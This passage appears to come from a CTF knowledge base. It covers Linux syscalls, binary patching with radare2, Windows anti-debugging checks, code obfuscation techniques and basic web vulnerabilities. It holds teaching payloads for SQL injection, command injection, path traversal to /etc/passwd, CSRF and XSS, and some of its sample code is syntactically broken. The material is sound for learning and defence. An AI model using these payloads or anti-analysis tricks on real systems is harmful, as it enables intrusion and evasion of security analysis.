strace: [ Process PID=7663 runs in 32 bit mode. ]
write(1, "Hello sysenter!\n", 16Hello sysenter!
)       = 16
exit(0)                                 = ?
+++ exited with 0 +++

可以看到，为了使用 sysenter 指令，需要为其手动布置栈。这是因为在 sysenter 返回时，会执行 __kernel_vsyscall 的后半部分（从0xf7fd5059开始）：

gdb-peda$ vmmap vdso
Start      End        Perm      Name
0xf7fd4000 0xf7fd6000 r-xp      [vdso]
gdb-peda$ disassemble __kernel_vsyscall
Dump of assembler code for function __kernel_vsyscall:
   0xf7fd5050 <+0>:     push   ecx
   0xf7fd5051 <+1>:     push   edx
   0xf7fd5052 <+2>:     push   ebp
   0xf7fd5053 <+3>:     mov    ebp,esp
   0xf7fd5055 <+5>:     sysenter
   0xf7fd5057 <+7>:     int    0x80
   0xf7fd5059 <+9>:     pop    ebp
   0xf7fd505a <+10>:    pop    edx
   0xf7fd505b <+11>:    pop    ecx
   0xf7fd505c <+12>:    ret
End of assembler dump.

__kernel_vsyscall 封装了 sysenter 调用的规范，是 vDSO 的一部分，而 vDSO 允许程序在用户层中执行内核代码。关于 vDSO 的内容我们将在后面的章节中细讲。

下面是一个 64 位使用 syscall 的例子：

.data

msg:
    .ascii "Hello 64-bit!\n"
    len = . - msg

.text
    .global _start

_start:
    movq  $1, %rdi
    movq  $msg, %rsi
    movq  $len, %rdx
    movq  $1, %rax
    syscall

    xorq  %rdi, %rdi
    movq  $60, %rax
    syscall

编译执行（不能编译成32位程序）：

$ gcc -c hello64.S
$ ld -o hello64 hello64.o
$ strace ./hello64
execve("./hello64", ["./hello64"], 0x7ffe11485290 /* 68 vars */) = 0
write(1, "Hello 64-bit!\n", 14Hello 64-bit!
)         = 14
exit(0)                                 = ?
+++ exited with 0 +++

在这两个例子中我们直接使用了 execve、write 和 exit 三个系统调用。但一般情况下，应用程序通过在用户空间实现的应用编程接口（API）而不是直接通过系统调用来编程。例如函数 printf() 的调用过程是这样的：

调用printf() ==> C库中的printf() ==> C库中的write() ==> write()系统调用

patch 二进制文件

什么是 patch

许多时候，我们不能获得程序源码，只能直接对二进制文件进行修改，这就是所谓的 patch，你可以使用十六进制编辑器直接修改文件的字节，也可以利用一些半自动化的工具。

patch 有很多种形式：

patch 二进制文件（程序或库）
在内存里 patch（利用调试器）
预加载库替换原库文件中的函数
triggers（hook 然后在运行时 patch）

手工 patch

手工 patch 自然会比较麻烦，但能让我们更好地理解一个二进制文件的构成，以及程序的链接和加载。有许多工具可以做到这一点，比如 xxd、dd、gdb、radare2 等等。

xxd

$ echo 01: 01 02 03 04 05 06 07 08 | xxd -r - output
$ xxd -g1 output
00000000: 00 01 02 03 04 05 06 07 08                       .........
$ echo 04: 41 42 43 44 | xxd -r - output
$ xxd -g1 output
00000000: 00 01 02 03 41 42 43 44 08                       ....ABCD.

参数 -r 用于将 hexdump 转换成 binary。这里我们先创建一个 binary，然后将将其中几个字节改掉。

radare2

一个简单的例子：

#include<stdio.h>
void main() {
    printf("hello");
    puts("world");
}
$ gcc -no-pie patch.c
$ ./a.out
helloworld

下面通过计算函数偏移，我们将 printf 换成 puts：

[0x004004e0]> pdf @ main
            ;-- main:
/ (fcn) sym.main 36
|   sym.main ();
|              ; DATA XREF from 0x004004fd (entry0)
|           0x004005ca      55             push rbp
|           0x004005cb      4889e5         mov rbp, rsp
|           0x004005ce      488d3d9f0000.  lea rdi, str.hello          ; 0x400674 ; "hello"
|           0x004005d5      b800000000     mov eax, 0
|           0x004005da      e8f1feffff     call sym.imp.printf         ; int printf(const char *format)
|           0x004005df      488d3d940000.  lea rdi, str.world          ; 0x40067a ; "world"
|           0x004005e6      e8d5feffff     call sym.imp.puts           ; sym.imp.printf-0x10 ; int printf(const char *format)
|           0x004005eb      90             nop
|           0x004005ec      5d             pop rbp
\           0x004005ed      c3             ret

地址 0x004005da 处的语句是 call sym.imp.printf，其中机器码 e8 代表 call，所以 sym.imp.printf 的偏移是 0xfffffef1。地址 0x004005e6 处的语句是 call sym.imp.puts，sym.imp.puts 的偏移是 0xfffffed5。

接下来找到两个函数的 plt 地址：

[0x004004e0]> is~printf
vaddr=0x004004d0 paddr=0x000004d0 ord=003 fwd=NONE sz=16 bind=GLOBAL type=FUNC name=imp.printf
[0x004004e0]> is~puts
vaddr=0x004004c0 paddr=0x000004c0 ord=002 fwd=NONE sz=16 bind=GLOBAL type=FUNC name=imp.puts

计算相对位置：

[0x004004e0]> ?v 0x004004d0-0x004004c0
0x10

所以要想将 printf 替换为 puts，只要替换成 0xfffffef1 -0x10 = 0xfffffee1 就可以了。

[0x004004e0]> s 0x004005da
[0x004005da]> wx e8e1feffff
[0x004005da]> pd 1
|           0x004005da      e8e1feffff     call sym.imp.puts           ; sym.imp.printf-0x10 ; int printf(const char *format)

搞定。

$ ./a.out
hello
world

当然还可以将这一过程更加简化，直接输入汇编，其他的事情 r2 会帮你搞定：

[0x004005da]> wa call 0x004004c0
Written 5 bytes (call 0x004004c0) = wx e8e1feffff
[0x004005da]> wa call sym.imp.puts
Written 5 bytes (call sym.imp.puts) = wx e8e1feffff

使用工具 patch

patchkit

patchkit 可以让我们通过 Python 脚本来 patch ELF 二进制文件。

反调试技术

什么是反调试

反调试是一种重要的软件保护技术，特别是在各种游戏保护中被尤其重视。另外，恶意代码往往也会利用反调试来对抗安全分析。当程序意识到自己可能处于调试中的时候，可能会改变正常的执行路径或者修改自身程序让自己崩溃，从而增加调试时间和复杂度。

反调试技术

下面先介绍几种 Windows 下的反调试方法。

函数检测

函数检测就是通过 Windows 自带的公开或未公开的函数直接检测程序是否处于调试状态。最简单的调试器检测函数是 IsDebuggerPresent()：

BOOL WINAPI IsDebuggerPresent(void);

该函数查询进程环境块（PEB）中的 BeingDebugged 标志，如果进程处在调试上下文中，则返回一个非零值，否则返回零。

示例：

BOOL CheckDebug()  
{  
    return IsDebuggerPresent();  
}

CheckRemoteDebuggerPresent() 用于检测一个远程进程是否处于调试状态：

BOOL WINAPI CheckRemoteDebuggerPresent(
  _In_    HANDLE hProcess,
  _Inout_ PBOOL  pbDebuggerPresent
);

如果 hProcess 句柄表示的进程处于调试上下文，则设置 pbDebuggerPresent 变量被设置为 TRUE，否则被设置为 FALSE。

BOOL CheckDebug()  
{  
    BOOL ret;  
    CheckRemoteDebuggerPresent(GetCurrentProcess(), &ret);  
    return ret;  
}

NtQueryInformationProcess 用于获取给定进程的信息：

NTSTATUS WINAPI NtQueryInformationProcess(
  _In_      HANDLE           ProcessHandle,
  _In_      PROCESSINFOCLASS ProcessInformationClass,
  _Out_     PVOID            ProcessInformation,
  _In_      ULONG            ProcessInformationLength,
  _Out_opt_ PULONG           ReturnLength
);

第二个参数 ProcessInformationClass 给定了需要查询的进程信息类型。当给定值为 0（ProcessBasicInformation）或 7（ProcessDebugPort）时，就能得到相关调试信息，返回信息会写到第三个参数 ProcessInformation 指向的缓冲区中。

示例：

BOOL CheckDebug()
{
    DWORD dbgport = 0;
    HMODULE hModule = LoadLibrary("Ntdll.dll");
    NtQueryInformationProcessPtr NtQueryInformationProcess = (NtQueryInformationProcessPtr)GetProcAddress(hModule, "NtQueryInformationProcess");
    NtQueryInformationProcess(GetCurrentProcess(), 7, &dbgPort, sizeof(dbgPort), NULL);
    return dbgPort != 0;
}

数据检测

数据检测是指程序通过测试一些与调试相关的关键位置的数据来判断是否处于调试状态。比如上面所说的 PEB 中的 BeingDebugged 参数。数据检测就是直接定位到这些数据地址并测试其中的数据，从而避免调用函数，使程序的行为更加隐蔽。

示例：

BOOL CheckDebug()
{
    int BeingDebug = 0;
    __asm
    {
        mov eax, dword ptr fs:[30h]   ; 指向PEB基地址
        mov eax, dword ptr [eax+030h]
        movzx eax, byte ptr [eax+2]
        mov BeingDebug, eax
    }
    return BeingDebug != 0;
}

由于调试器中启动的进程与正常启动的进程创建堆的方式有些不同，系统使用 PEB 结构偏移量 0x68 处的一个未公开的位置，来决定如果创建堆结构。如果这个位置上的值为 0x70，则进程处于调试器中。

示例：

BOOL CheckDebug()
{
    int BeingDbg = 0;
    __asm
    {
        mov eax, dword ptr fs:[30h]
        mov eax, dword ptr [eax + 68h]
        and eax, 0x70
        mov BeingDbg, eax
    }
    return BeingDbg != 0;
}

符号检测

符号检测主要针对一些使用了驱动的调试器或监视器，这类调试器在启动后会创建相应的驱动链接符号，以用于应用层与其驱动的通信。但由于这些符号一般都比较固定，所以就可以通过这些符号来确定是否存在相应的调试软件。

示例：

BOOL CheckDebug()
{
    HANDLE hDevice = CreateFileA("\\\\.\\PROCEXP153", GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, 0, 0);
    if (hDevice)
    {
        return 0;
    }
}

窗口检测

窗口检测通过检测当前桌面中是否存在特定的调试窗口来判断是否存在调试器，但不能判断该调试器是否正在调试该程序。

示例：

BOOL CheckDebug()
{
    if (FindWindowA("OllyDbg", 0))
    {
        return 0;
    }
    return 1;
}

特征码检测

特征码检测枚举当前正在运行的进程，并在进程的内存空间中搜索特定调试器的代码片段。

例如 OllyDbg 有这样一段特征码：

0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x75, 0x00, 0x74, 0x00,
0x20, 0x00, 0x4f, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79, 0x00,
0x44, 0x00, 0x62, 0x00, 0x67, 0x00, 0x00, 0x00, 0x4f, 0x00,
0x4b, 0x00, 0x00, 0x00

示例：

BOOL CheckDebug()
{
    BYTE sign[] = {0x41, 0x00, 0x62, 0x00, 0x6f, 0x00, 0x75, 0x00, 0x74, 0x00,
                0x20, 0x00, 0x4f, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79, 0x00,
                0x44, 0x00, 0x62, 0x00, 0x67, 0x00, 0x00, 0x00, 0x4f, 0x00,
                0x4b, 0x00, 0x00, 0x00;}

    PROCESSENTRY32 sentry32 = {0};
    sentry32.dwSize = sizeof(sentry32);
    HANDLE phsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    Process32First(phsnap, &sentry32);
    do{
        HANDLE hps = OpenProcess(MAXIMUM_ALLOWED, FALSE, sentry32.th32ProcessID);
        if (hps != 0)
        {
            DWORD szReaded = 0;
            BYTE signRemote[sizeof(sign)];
            ReadProcessMemory(hps, (LPCVOID)0x4f632a, signRemote, sizeof(signRemote), &szReaded);
            if (szReaded > 0)
            {
                if (memcmp(sign, signRemote, sizeof(sign)) == 0)
                {
                    CloseHandle(phsnap);
                    return 0;
                }
            }
        }
    }
    sentry32.dwSize = sizeof(sentry32);
}while(Process32Next(phsnap, &sentry32));

行为检测

行为检测是指在程序中通过代码感知程序处于调试时与未处于调试时的各种差异来判断程序是否处于调试状态。例如我们在调试时步过两条指令所花费的时间远远超过 CPU 正常执行花费的时间，于是就可以通过 rdtsc 指令来进行测试。（该指令用于将时间标签计数器读入 EDX:EAX 寄存器）

示例：

BOOL CheckDebug()
{
    int BeingDbg = 0;
    __asm
    {
        rdtsc
        mov ecx, edx
        rdtsc
        sub edx, ecx
        mov BeingDbg, edx
    }
    if (BeingDbg > 2)
    {
        return 0;
    }
    return 1;
}

断点检测

断点检测是根据调试器设置断点的原理来检测软件代码中是否设置了断点。调试器一般使用两者方法设置代码断点：

通过修改代码指令为 INT3（机器码为0xCC）触发软件异常
通过硬件调试寄存器设置硬件断点

针对软件断点，检测系统会扫描比较重要的代码区域，看是否存在多余的 INT3 指令。

示例：

BOOL CheckDebug()
{
    PIMAGE_DOS_HEADER pDosHeader;
    PIMAGE_NT_HEADERS32 pNtHeaders;
    PIMAGE_SECTION_HEADER pSectionHeader;
    DWORD dwBaseImage = (DWORD)GetModuleHandle(NULL);
    pDosHeader = (PIMAGE_DOS_HEADER)dwBaseImage;
    pNtHeaders = (PIMAGE_NT_HEADERS32)((DWORD)pDosHeader + pDosHeader->e_lfanew);
    pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pNtHeaders + sizeof(pNtHeaders->Signature) + sizeof(IMAGE_FILE_HEADER) +
                     (WORD)pNtHeaders->FileHeader.SizeOfOptionalHeader);
    DWORD dwAddr = pSectionHeader->VirtualAddress + dwBaseImage;
    DWORD dwCodeSize = pSectionHeader->SizeOfRawData;
    BOOL Found = FALSE;
    __asm
    {
        cld
        mov     edi,dwAddr
        mov     ecx,dwCodeSize
        mov     al,0CCH
        repne   scasb   ; 在EDI指向大小为ECX的缓冲区中搜索AL包含的字节
        jnz     NotFound
        mov Found,1
NotFound:
    }
    return Found;
}

而对于硬件断点，由于程序工作在保护模式下，无法访问硬件调试断点，所以一般需要构建异常程序来获取 DR 寄存器的值。

示例：

BOOL CheckDebug()
{
    CONTEXT context;  
    HANDLE hThread = GetCurrentThread();  
    context.ContextFlags = CONTEXT_DEBUG_REGISTERS;  
    GetThreadContext(hThread, &context);  
    if (context.Dr0 != 0 || context.Dr1 != 0 || context.Dr2 != 0 || context.Dr3!=0)
    {  
        return 1;  
    }  
    return 0;  
}

行为占用

行为占用是指在需要保护的程序中，程序自身将一些只能同时有 1 个实例的功能占为己用。比如一般情况下，一个进程只能同时被 1 个调试器调试，那么就可以设计一种模式，将程序以调试方式启动，然后利用系统的调试机制防止被其他调试器调试。

指令混淆

为什么需要指令混淆

软件的安全性严重依赖于代码复杂化后被分析者理解的难度，通过指令混淆，可以将原始的代码指令转换为等价但极其复杂的指令，从而尽可能地提高分析和破解的成本。

常见的混淆方法

代码变形

代码变形是指将单条或多条指令转变为等价的单条或多条其他指令。其中对单条指令的变形叫做局部变形，对多条指令结合起来考虑的变成叫做全局变形。

例如下面这样的一条赋值指令：

mov eax, 12345678h

可以使用下面的组合指令来替代：

push 12345678h
pop eax

更进一步：

pushfd
mov eax, 1234
shl eax, 10
mov ax, 5678
popfd

pushfd 和 popfd 是为了保护 EFLAGS 寄存器不受变形后指令的影响。

继续替换：

pushfd
push 1234
pop eax
shl eax, 10
mov ax 5678

这样的结果就是简单的指令也可能会变成上百上千条指令，大大提高了理解的难度。

再看下面的例子：

jmp {label}

可以变成：

push {label}
ret

而且 IDA 不能识别出这种 label 标签的调用结构。

指令：

call {label}

可以替换成：

push {call指令后面的那个label}
push {label}
ret

指令：

push {op}

可以替换成：

sub esp, 4
mov [esp], {op}

下面我们来看看全局变形。对于下面的代码：

mov eax, ebx
mov ecx, eax

因为两条代码具有关联性，在变形时需要综合考虑，例如下面这样：

mov cx, bx
mov ax, cx
mov ch, bh
mov ah, bh

这种具有关联性的特定使得通过变形后的代码推导变形前的代码更加困难。

花指令

花指令就是在原始指令中插入一些虽然可以被执行但是没有任何作用的指令，它的出现只是为了扰乱分析，不仅是对分析者来说，还是对反汇编器、调试器来说。

来看个例子，原始指令如下：

add eax, ebx
mul ecx

加入花指令之后：

xor esi, 011223344h
add esi, eax
add eax, ebx
mov edx, eax
shl edx, 4
mul ecx
xor esi, ecx

其中使用了源程序不会使用到的 esi 和 edx 寄存器。这就是一种纯粹的垃圾指令。

有的花指令用于干扰反汇编器，例如下面这样：

01003689    50          push eax
0100368A    53          push ebx

加入花指令后：

01003689    50          push eax
0100368A    EB 01       jmp short 0100368D
0100368C    FF53 6A     call dword ptr [ebx+6A]

乍一看似乎很奇怪，其实是加入因为加入了机器码 EB 01 FF，使得线性分析的反汇编器产生了误判。而在执行时，第二条指令会跳转到正确的位置，流程如下：

01003689    50          push eax
0100368A    EB 01       jmp short 0100368D
0100368C    90          nop
0100368D    53          push ebx

扰乱指令序列

指令一般都是按照一定序列执行的，例如下面这样：

01003689    push eax
0100368A    push ebx
0100368B    xor eax, eax
0100368D    cmp eax, 0
01003690    jne short 01003695
01003692    inc eax
01003693    jmp short 0100368D
01003695    pop ebx
01003696    pop eax

指令序列看起来很清晰，所以扰乱指令序列就是要打乱这种指令的排列方式，以干扰分析者：

01003689    push eax
0100368A    jmp short 01003694
0100368C    xor eax, eax
0100368E    jmp short 01003697
01003690    jne short 0100369F
01003692    jmp short 0100369C
01003694    push ebx
01003695    jmp short 0100368C
01003697    cmp eax, 0
0100369A    jmp short 01003690
0100369C    inc eax
0100369D    jmp short 01003697
0100369F    pop ebx
010036A0    pop eax

虽然看起来很乱，但真实的执行顺序没有改变。

多分支

多分支是指利用不同的条件跳转指令将程序的执行流程复杂化。与扰乱指令序列不同的时，多分支改变了程序的执行流。举个例子：

01003689    push eax
0100368A    push ebx
0100368B    push ecx
0100368C    push edx

变形如下：

01003689    push eax
0100368A    je short 0100368F
0100368C    push ebx
0100368D    jmp short 01003690
0100368F    push ebx
01003690    push ecx
01003691    push edx

代码里加入了一个条件分支，但它究竟会不会触发我们并不关心。于是程序具有了不确定性，需要在执行时才能确定。但可以肯定的时，这段代码的执行结果和原代码相同。

再改进一下，用不同的代码替换分支处的代码：

01003689    push eax
0100368A    je short 0100368F
0100368C    push ebx
0100368D    jmp short 01003693
0100368F    push eax
01003690    mov dword ptr [esp], ebx
01003693    push ecx
01003694    push edx

不透明谓词

不透明谓词是指一个表达式的值在执行到某处时，对程序员而言是已知的，但编译器或静态分析器无法推断出这个值，只能在运行时确定。上面的多分支其实也是利用了不透明谓词。

下面的代码中：

mov esi, 1
... ; some code not touching esi
dec esi
...
cmp esi, 0
jz real_code
; fake luggage
real_code:

假设我们知道这里 esi 的值肯定是 0，那么就可以在 fake luggage 处插入任意长度和复杂度的指令，以达到混淆的目的。

其它的例子还有（同样假设esi为0）：

add eax, ebx
mul ecx
add eax, esi

间接指针

dummy_data1 db      100h dup (0)
message1    db      'hello world', 0

dummy_data2 db      200h dup (0)
message2    db      'another message', 0

func        proc
            ...
            mov     eax, offset dummy_data1
            add     eax, 100h
            push    eax
            call    dump_string
            ...
            mov     eax, offset dummy_data2
            add     eax, 200h
            push    eax
            call    dump_string
            ...
func        endp

这里通过 dummy_data 来间接地引用 message，但 IDA 就不能正确地分析到对 message 的引用。

代码虚拟化

基于虚拟机的代码保护也可以算是代码混淆技术的一种，是目前各种混淆中保护效果最好的。简单地说，该技术就是通过许多模拟代码来模拟被保护的代码的执行，然后计算出与被保护代码执行时相同的结果。

+------------+
| 头部指令序列 | -------> | 代码虚拟机入口 |
|------------|                  |
|            |          | 保存代码现场 |
|            |                  |
| 中间指令序列 |          | 模拟执行中间指令序列 |
|            |                  |
|            |          | 设置新的代码现场 |
|------------|                  |
| 尾部指令序列 | <------- | 代码虚拟机出口 |
+------------+

当原始指令执行到指令序列的开始处，就转入代码虚拟机的入口。此时需要保存当前线程的上下文信息，然后进入模拟执行阶段，该阶段是代码虚拟机的核心。有两种方案来保证虚拟机代码与原始代码的栈空间使用互不冲突，一种是在堆上开辟开辟新的空间，另一种是继续使用原始代码所使用的栈空间，这两种方案互有优劣，在实际中第二种使用较多。

对于怎样模拟原始代码，同样有两种方案。一种是将原本的指令序列转变为一种具有直接或者间接对应关系的，只有虚拟机才能理解的代码数据。例如用 0 来表示 push， 1 表示 mov 等。这种直接或间接等价的数据称为 opcode。另一种方案是将原始代码的意义直接转换成新的代码，类似于代码变形，这种方案基于指令语义，所以设计难度非常大。

Web Exploitation

https://ctf101.org/web-exploitation/overview/

Websites all around the world are programmed using various programming languages. While the developer should be aware of specific vulnerabilities in each programming language, there are issues fundamental to the internet that can show up regardless of the chosen language or framework.

These vulnerabilities often show up in CTFs as web security challenges where the user needs to exploit a bug to gain some kind of higher-level privilege.

Common vulnerabilities to see in CTF challenges:

SQL Injection
Command Injection
Directory Traversal
Cross-Site Request Forgery
Cross-Site Scripting
Server-Side Request Forgery

SQL Injection

SQL Injection is a vulnerability where an application takes input from a user and doesn't validate that the user's input doesn't contain additional SQL.

<?php
    $username = $_GET['username']; // kchung
    $result = mysql_query("SELECT * FROM users WHERE username='$username'");
?>

If we look at the $username variable, we might expect the username parameter to be a real username (e.g. kchung) under normal operation.

But a malicious user might submit a different kind of data. For example, consider if the input was '?

The application would crash because the resulting SQL query is incorrect.

SELECT * FROM users WHERE username='''

Notice the extra single quote at the end.

With the knowledge that a single quote will cause an error in the application, we can expand a little more on SQL Injection.

What if our input was ' OR 1=1?

SELECT * FROM users WHERE username='' OR 1=1

1 is indeed equal to 1. This equates to true in SQL. If we reinterpret this the SQL statement is really saying

SELECT * FROM users WHERE username='' OR true

This will return every row in the table because each row that exists must be true.

We can also inject comments and termination characters like -- or /* or ;. This allows you to terminate SQL queries after your injected statements. For example '-- is a common SQL injection payload.

SELECT * FROM users WHERE username=''-- '

This payload sets the username parameter to an empty string to break out of the query and then adds a comment (--) that effectively hides the second single quote.

Using this technique of adding SQL statements to an existing query we can force databases to return data that it was not meant to return.

Command Injection

Command Injection is a vulnerability that allows an attacker to submit system commands to a computer running a website. This happens when the application fails to encode user input that goes into a system shell. It is very common to see this vulnerability when a developer uses the system() command or its equivalent in the application's programming language.

import os

domain = user_input() # ctf101.org

os.system('ping ' + domain)

The above code when used normally will ping the ctf101.org domain.

But consider what would happen if the user_input() function returned different data.

import os

domain = user_input() # ; ls

os.system('ping ' + domain)

Because of the additional semicolon, the os.system() function is instructed to run two commands.

It looks to the program as:

ping ; ls

The semicolon terminates a command in bash and allows you to put another command after it.

Because the ping command is being terminated and the ls command is being added on, the ls command will be run in addition to the empty ping command!

This is the core concept behind command injection. The ls command could of course be switched with another command (e.g. wget, curl, bash, etc.)

Command injection is a very common means of privilege escalation within web applications and applications that interface with system commands. Many kinds of home routers take user input and directly append it to a system command. For this reason, many of those home router models are vulnerable to command injection.

Example Payloads

;ls
$(ls)
ls

Directory Traversal

Directory Traversal is a vulnerability where an application takes in user input and uses it in a directory path.

Any kind of path controlled by user input that isn't properly sanitized or properly sandboxed could be vulnerable to directory traversal.

For example, consider an application that allows the user to choose what page to load from a GET parameter.

<?php
    $page = $_GET['page']; // index.php
    include("/var/www/html/" . $page);
?>

Under normal operation, the page would be index.php. But what if a malicious user gave in something different?

<?php
    $page = $_GET['page']; // ../../../../../../../../etc/passwd
    include("/var/www/html/" . $page);
?>

Here the user is submitting ../../../../../../../../etc/passwd.

This will result in the PHP interpreter leaving the directory that it is coded to look in ('/var/www/html') and instead be forced up to the root folder.

include("/var/www/html/../../../../../../../../etc/passwd");

Ultimately this will become /etc/passwd because the computer will not go a directory above its top directory.

Thus the application will load the /etc/passwd file and emit it to the user like so:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false

This same concept can be applied to applications where some input is taken from a user and then used to access a file or path or similar. This vulnerability very often can be used to leak sensitive data or extract application source code to find other vulnerabilities.

Cross-Site Request Forgery (CSRF)

A Cross-Site Request Forgery or CSRF Attack pronounced see the surf, is an attack on an authenticated user which uses a state session in order to perform state-changing attacks like a purchase, a transfer of funds, or a change of email address.

The entire premise of CSRF is based on session hijacking, usually by injecting malicious elements within a webpage through a <img> tag or a <iframe> where references to external resources are unverified.

Using CSRF

GET requests are often used by websites to get user input. Say a user signs in to a banking site that assigns their browser a cookie that keeps them logged in. If they transfer some money, the URL that is sent to the server might have the pattern:

http://securibank.com/transfer.do?acct=[RECEPIENT]&amount=[DOLLARS]

Knowing this format, an attacker can send an email with a hyperlink to be clicked on or they can include an image tag of 0 by 0 pixels which will automatically be requested by the browser such as:

<img src="http://securibank.com/transfer.do?acct=[RECEPIENT]&amount=[DOLLARS]" width="0" height="0" border="0">

Cross-Site Scripting (XSS)

Cross-Site Scripting or XSS is a vulnerability where one user of an application can send JavaScript that is executed by the browser of another user of the same application.

This is a vulnerability because JavaScript has a high degree of control over a user's web browser.

For example, JavaScript has the ability to:

Modify the page (called the DOM)
Send more HTTP requests
Access cookies

By combining all of these abilities, XSS can maliciously use JavaScript to extract users' cookies and send them to an attacker-controlled server. XSS can also modify the DOM to phishing users for their passwords. This only scratches the surface of what XSS can be used to do.

XSS is typically broken down into three categories:

Reflected XSS
Stored XSS
DOM XSS

Reflected XSS

Reflected XSS is when an XSS exploit is provided through a URL parameter.

For example:

https://ctf101.org?data=<script>alert(1)</script>

You can see the XSS exploit provided in the data GET parameter. If the application is vulnerable to reflected XSS, the application will take this data parameter value and inject it into the DOM.

For example:

<html>
    <body>
        <script>alert(1)</script>
    </body>
</html>

Depending on where the exploit gets injected, it may need to be constructed differently.

Also, the exploit payload can change to fit whatever the attacker needs it to do. Whether that is to extract cookies and submit them to an external server, or to simply modify the page to deface it.

One of the deficiencies of reflected XSS however is that it requires the victim to access the vulnerable page from an attacker-controlled resource. Notice that if the data parameter, wasn't provided the exploit wouldn't work.

In many situations, reflected XSS is detected by the browser because it is very simple for a browser to detect malicious XSS payloads in URLs.

Stored XSS

Stored XSS is different from reflected XSS in one key way. In reflected XSS, the exploit is provided through a GET parameter. But in stored XSS, the exploit is provided from the website itself.

Imagine a website that allows users to post comments. If a user can submit an XSS payload as a comment, and then have others view that malicious comment, it would be an example of stored XSS.

The reason is that the website itself is serving up the XSS payload to other users. This makes it very difficult to detect from the browser's perspective and no browser is capable of generically preventing stored XSS from exploiting a user.

DOM XSS

DOM XSS is XSS that is due to the browser itself injecting an XSS payload into the DOM. While the server itself may properly prevent XSS, it's possible that the client-side scripts may accidentally take a payload and insert it into the DOM and cause the payload to trigger.

The server itself is not to blame, but the client-side JavaScript files are causing the issue.

Server Side Request Forgery (SSRF)

Server Side Request Forgery or SSRF is where an attacker is able to cause a web application to send a request that the attacker defines.

For example, say there is a website that lets you take a screenshot of any site on the internet.

Under normal usage, a user might ask it to take a screenshot of a page like Google, or The New York Times. But what if a user does something more nefarious? What if they asked the site to take a picture of http://localhost? Or perhaps tries to access something more useful like http://localhost/server-status?

127.0.0.1 (also known as localhost or loopback) represents the computer itself. Accessing localhost means you are accessing the computer's own internal network. Developers often use localhost as a way to access the services they have running on their own computers.

Depending on what the response from the site is the attacker may be able to gain additional information about what's running on the computer itself.

In addition, the requests originating from the server would come from the server's IP, not the attacker's IP. Because of that, it is possible that the attacker might be able to access internal resources that he wouldn't normally be able to access.

Another usage for SSRF is to create a simple port scanner to scan the internal network looking for internal services.

COMPASS CTF Knowledge Base